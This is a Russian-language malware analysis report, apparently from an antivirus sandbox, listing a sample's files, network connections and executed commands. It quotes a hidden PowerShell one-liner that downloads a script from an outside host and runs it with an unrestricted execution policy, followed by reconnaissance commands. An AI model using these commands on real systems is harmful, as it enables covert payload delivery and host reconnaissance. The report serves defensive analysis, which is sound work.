Техническая информация
Вредоносные функции
Загружает
- http://hr.#edyn.io/1.ps1 as c:/windows/temp/1.ps1
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\1.ps1
- %WINDIR%\temp\8f720a5db6c7\policy.txt
- %WINDIR%\temp\8f720a5db6c7\netuser.txt
- %WINDIR%\temp\8f720a5db6c7\arp.txt
- %WINDIR%\temp\8f720a5db6c7\netstat.txt
- %WINDIR%\temp\8f720a5db6c7\ipconfig.txt
- %WINDIR%\temp\8f720a5db6c7\apps.txt
- %WINDIR%\temp\8f720a5db6c7\service.txt
- %WINDIR%\temp\8f720a5db6c7\process.txt
- %WINDIR%\temp\8f720a5db6c7\networkadapterconfig.txt
- %WINDIR%\temp\8f720a5db6c7\ip.txt
- %WINDIR%\temp\8f720a5db6c7\cpu.txt
- %WINDIR%\temp\8f720a5db6c7\ram.txt
- %WINDIR%\temp\8f720a5db6c7\bios.txt
- %WINDIR%\temp\8f720a5db6c7\summary.txt
- %WINDIR%\temp\8f720a5db6c7\disk.txt
- %WINDIR%\temp\777.log
Удаляет следующие файлы
- %WINDIR%\temp\1.ps1
Сетевая активность
Подключается к
- 'hr.#edyn.io':80
- 'hr.#edyn.io':443
- 'x1.#.lencr.org':80
TCP
Запросы HTTP GET
- http://hr.#edyn.io/1.ps1
- http://x1.#.lencr.org/
Другие
- 'hr.#edyn.io':443
UDP
- DNS ASK hr.#edyn.io
- DNS ASK x1.#.lencr.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -ExecutionPolicy Unrestricted -File "C:/windows/temp/1.ps1"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://hr.#edyn.io/1.ps1', 'C:/windows/temp/1.ps1')
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -ExecutionPolicy Unrestricted -File "C:/windows/temp/1.ps1"
- '<SYSTEM32>\ipconfig.exe' /all
- '<SYSTEM32>\netstat.exe' -ano
- '<SYSTEM32>\arp.exe' -a -v
- '<SYSTEM32>\net.exe' user
- '<SYSTEM32>\net1.exe' user
